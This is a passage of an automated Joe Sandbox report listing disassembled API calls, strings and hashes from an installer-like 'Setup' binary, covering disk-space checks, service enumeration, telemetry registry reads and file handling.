                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ErrorExceptionLastRaise__wcsicoll
                                                                                              • String ID: Blocking Services$No Blocking Services
                                                                                              • API String ID: 1137283054-2473106011
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953E1B
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Height$Hide$Width
                                                                                              • API String ID: 431132790-1313002608
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395C7B2
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • GetStringTypeExW.KERNEL32(00000000,00000001,?,00000001,?,63945D9C,?,00000030,80070057), ref: 6395C86B
                                                                                                • Part of subcall function 639681DE: _memcpy_s.LIBCMT ref: 63968224
                                                                                                • Part of subcall function 6395ECE8: _wcschr.LIBCMT ref: 6395ECFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$StringType_memcpy_s_wcschr
                                                                                              • String ID: </a$href
                                                                                              • API String ID: 3166021290-1826667848
                                                                                              APIs
                                                                                              • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 6C5DA9D3
                                                                                              • memset.MSVCRT ref: 6C5DAA5F
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              Strings
                                                                                              • Microsoft\Windows\Sqm\Upload, xrefs: 6C5DFF0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile_vsnwprintfmemset
                                                                                              • String ID: Microsoft\Windows\Sqm\Upload
                                                                                              • API String ID: 1199674523-1629975561
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63958846
                                                                                                • Part of subcall function 63961169: __EH_prolog3.LIBCMT ref: 63961170
                                                                                                • Part of subcall function 63961169: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 639611B1
                                                                                                • Part of subcall function 6395EB56: __wcsicoll.LIBCMT ref: 6395EB74
                                                                                                • Part of subcall function 63961360: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,Action,6397FE10,?,?,?,205ABF9D,Action,?,00000000), ref: 63961395
                                                                                                • Part of subcall function 63961360: GetLastError.KERNEL32(?,?,?,205ABF9D,Action,?,00000000), ref: 639613A5
                                                                                              Strings
                                                                                              • $$AvailableSpaceOnSystemDrive$$, xrefs: 6395897E
                                                                                              • $$SystemDrive$$, xrefs: 63958895
                                                                                              • $$RequiredSpaceOnSystemDrive$$, xrefs: 639588FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DirectoryDiskErrorFreeLastSpaceSystem__wcsicoll
                                                                                              • String ID: $$AvailableSpaceOnSystemDrive$$$$$RequiredSpaceOnSystemDrive$$$$$SystemDrive$$
                                                                                              • API String ID: 2351290856-2773778658
                                                                                              APIs
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63967ACF: GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 63967AFC
                                                                                                • Part of subcall function 63950ECA: SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 63950F06
                                                                                              • PathFileExistsW.SHLWAPI(?,?,205ABF9D), ref: 63951126
                                                                                              • ShellExecuteW.SHELL32(00000001,print,?,00000000,00000000,00000000), ref: 6395116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExecuteExistsFileH_prolog3MessageSendShellTemp
                                                                                              • String ID: %s\BlockersInfo%d.rtf$print
                                                                                              • API String ID: 2742019059-575943144
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL$|Z^l
                                                                                              • API String ID: 471583391-4098726421
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63955ED5
                                                                                                • Part of subcall function 63953AD4: __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395434E: __EH_prolog3.LIBCMT ref: 63954355
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: RepairRadioButton$UninstallRadioButton$UserExperienceDataCollection
                                                                                              • API String ID: 431132790-1241949946
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: CEIPEnable
                                                                                              • API String ID: 3677997916-1389088331
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953823
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: HTML$RTF$Type
                                                                                              • API String ID: 431132790-2981198847
                                                                                              APIs
                                                                                              • GetSystemTime.KERNEL32(00000000,00000000,?,?,?,6C5D833E,?), ref: 6C5D84AF
                                                                                              • SystemTimeToFileTime.KERNEL32(6C5D833E,6C5D833E,?,?,?,6C5D833E,?), ref: 6C5D84BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File
                                                                                              • String ID: MSQM$x
                                                                                              • API String ID: 2838179519-3648152566
                                                                                              • Opcode ID: 6133eac015d52eb0457b5b876c300b03604d55eb91937dbf131fbd97e5d92ca1
                                                                                              • Instruction ID: 3b9f516ac39090b1f4694c1f13a8948088145ea2df69c257be96e0b92c75fd6a
                                                                                              • Opcode Fuzzy Hash: 6133eac015d52eb0457b5b876c300b03604d55eb91937dbf131fbd97e5d92ca1
                                                                                              • Instruction Fuzzy Hash: BF11AD30A10308EBCB05DF6ACC84E8E3BBAAB05358F420965E411DBA60D370E985CF4E
                                                                                              APIs
                                                                                              Strings
                                                                                              • ServicesActive, xrefs: 63967354
                                                                                              • OpenSCManager failed with error: %u, xrefs: 63967396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last
                                                                                              • String ID: OpenSCManager failed with error: %u$ServicesActive
                                                                                              • API String ID: 685212868-337506387
                                                                                              • Opcode ID: acd745880a23dd9f0216cfe90f48d2b279ede1e57e2b72d8ca5d6b9d96fbecbc
                                                                                              • Instruction ID: 50314f4851e370cbce0457ea3a68592659ed9389585a4fbe814fed0b682b6465
                                                                                              • Opcode Fuzzy Hash: acd745880a23dd9f0216cfe90f48d2b279ede1e57e2b72d8ca5d6b9d96fbecbc
                                                                                              • Instruction Fuzzy Hash: 2C0124716553028FE7209BA8CC44B5A37B1BF82F28F240438E505DB2C2DB70D8008F50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957F11
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 639660A8: __EH_prolog3.LIBCMT ref: 639660AF
                                                                                                • Part of subcall function 6394B8EF: __EH_prolog3.LIBCMT ref: 6394B8F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: complete$Action$Enumerating incompatible services
                                                                                              • API String ID: 431132790-2452571594
                                                                                              • Opcode ID: e250445e0f6c0017c4549d617c272251a944e9623f864c85f50c8ffbf6956486
                                                                                              • Instruction ID: 957bee477fb2821919b6ecd4c8f2e876381e5dcc5ab59857b12aef7809208864
                                                                                              • Opcode Fuzzy Hash: e250445e0f6c0017c4549d617c272251a944e9623f864c85f50c8ffbf6956486
                                                                                              • Instruction Fuzzy Hash: 2E116D32800258EFCF11EBD4C900ADE7BB5AF1AB14F14405AF154AB252C775CA55EFA1
                                                                                              APIs
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,Action,6397FE10,?,?,?,205ABF9D,Action,?,00000000), ref: 63961395
                                                                                              • GetLastError.KERNEL32(?,?,?,205ABF9D,Action,?,00000000), ref: 639613A5
                                                                                                • Part of subcall function 6394C71B: __EH_prolog3.LIBCMT ref: 6394C722
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskErrorFreeH_prolog3LastSpace
                                                                                              • String ID: Action$GetDiskFreeSpaceEx
                                                                                              • API String ID: 3776785849-3943406023
                                                                                              • Opcode ID: 89374e042ae7f81f457b0360166ccd3c2c0edc4e6ab125e2b69ee0ade3dde879
                                                                                              • Instruction ID: ead5decd5bd7568311890101d4da1882bcdbbc12c493ebf07eaf872828aec118
                                                                                              • Opcode Fuzzy Hash: 89374e042ae7f81f457b0360166ccd3c2c0edc4e6ab125e2b69ee0ade3dde879
                                                                                              • Instruction Fuzzy Hash: 47014BB6D04219AF8B00EF99C8448EFBBB9EB99700B008449F511F7205E770A709CF90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639578DC
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_memcpy_s
                                                                                              • String ID: Not Visible$Visible$[%u] [%s] [%s] [%s]
                                                                                              • API String ID: 1212206098-88040887
                                                                                              • Opcode ID: 48940536b87696f0480960b87f08ca8f572790f91160e313f474d57ded443679
                                                                                              • Instruction ID: 93ab9a04bb51a4256e2d7a13daa7d181afa8c8a90f7acb33ce13f2dbbcef247f
                                                                                              • Opcode Fuzzy Hash: 48940536b87696f0480960b87f08ca8f572790f91160e313f474d57ded443679
                                                                                              • Instruction Fuzzy Hash: 4F017CB5505646AFDB11CFA8C804B8DBBB0FF26A04F048540F8589B302D734E920CFE1
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(netapi32,NetGetJoinInformation,00000007), ref: 6C5EA6C4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C5EA6CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: NetGetJoinInformation$netapi32
                                                                                              • API String ID: 2574300362-2552388246
                                                                                              • Opcode ID: 9da9b6813b5a1ee17a37df7ca5b0b6df8888ecfc0e307c9337ae8427ba66dbe6
                                                                                              • Instruction ID: b92e3303c6b2cfdf3e4f80e06e7b7a24269a105c0510e65e966bef3ed8246647
                                                                                              • Opcode Fuzzy Hash: 9da9b6813b5a1ee17a37df7ca5b0b6df8888ecfc0e307c9337ae8427ba66dbe6
                                                                                              • Instruction Fuzzy Hash: F6E08071A883469BD64056B95D04A673BB8575B375B110511F529C1CC1D770E400991C
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(netapi32,NetApiBufferFree,00000007), ref: 6C5EA727
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C5EA72E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: NetApiBufferFree$netapi32
                                                                                              • API String ID: 1646373207-4116497281
                                                                                              • Opcode ID: 16ad16307735b5c8a92e9965fdaf5f98c544e7a9b4025c9a94a8357b47308b2f
                                                                                              • Instruction ID: 4f6e0bde6b9f51a0e4602b61a1787c02142e6ae2cdc3e3fa8776b04a7f1e082e
                                                                                              • Opcode Fuzzy Hash: 16ad16307735b5c8a92e9965fdaf5f98c544e7a9b4025c9a94a8357b47308b2f
                                                                                              • Instruction Fuzzy Hash: 01E0867164830696EA50D6BB6C58A7B3EB84B99334B260911F929C9CC1DB74E8408618
                                                                                              APIs
                                                                                              • OpenEventA.KERNEL32(00100000,00000000,Global\TabletHardwarePresent), ref: 6C5EA902
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 6C5EA910
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6C5EA91E
                                                                                              Strings
                                                                                              • Global\TabletHardwarePresent, xrefs: 6C5EA8F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandleObjectOpenSingleWait
                                                                                              • String ID: Global\TabletHardwarePresent
                                                                                              • API String ID: 1727428665-3144360101
                                                                                              • Opcode ID: 54103bb663a46064da6c3655be55da2db6737a94f3d7b28dc1d3980b3d58fad8
                                                                                              • Instruction ID: c5495d4166117953ae0614c1c47930b7b853b936d8d2b5407d0804739008e7fc
                                                                                              • Opcode Fuzzy Hash: 54103bb663a46064da6c3655be55da2db6737a94f3d7b28dc1d3980b3d58fad8
                                                                                              • Instruction Fuzzy Hash: 5AD01732301230B7863112BAAC0CEAF6D78DBCFEF57071210F84AD36009A208802C1E9
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D78C4
                                                                                              • memmove.MSVCRT(?,?,00000001,?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,6C5ED3F8), ref: 6C5E5485
                                                                                              • memset.MSVCRT ref: 6C5E54A4
                                                                                              • memmove.MSVCRT(?,?,00010000,?,?,000000FB,00000000,?,00000000,000000FF,?,?,?,?,?,00000004), ref: 6C5E54C9
                                                                                              • memmove.MSVCRT(?,?,?,?,?,?,?,?,000000FB,00000000,?,00000000,000000FF,?,?,?), ref: 6C5E54F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memmove$memset
                                                                                              • String ID:
                                                                                              • API String ID: 3790616698-0
                                                                                              • Opcode ID: 077d26f26fda551de48103a5ceb68b6a756d6473fb55a76aeae2e47fc2184c85
                                                                                              • Instruction ID: b73fbd2e71afa82469375343a7c95c0ac876bab31d0b638d812f35e896712903
                                                                                              • Opcode Fuzzy Hash: 077d26f26fda551de48103a5ceb68b6a756d6473fb55a76aeae2e47fc2184c85
                                                                                              • Instruction Fuzzy Hash: BB315EB2600608AFDB14CE68CD84DAB77EAEB88354B05462CF84AC7B14DB30FE45CB54
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(6C5D833E,80010000,00000001,00000000,00000003,00000080,00000000,Function_00007AF4,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D840B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D841B
                                                                                              • CloseHandle.KERNEL32(6C5D833E,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D847C
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • ReadFile.KERNEL32(6C5D833E,00000000,?,6C5D833E,00000000,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D844B
                                                                                                • Part of subcall function 6C5D84A3: GetSystemTime.KERNEL32(00000000,00000000,?,?,?,6C5D833E,?), ref: 6C5D84AF
                                                                                                • Part of subcall function 6C5D84A3: SystemTimeToFileTime.KERNEL32(6C5D833E,6C5D833E,?,?,?,6C5D833E,?), ref: 6C5D84BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Time$System$CloseCreateHandleReadSizemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1717276877-0
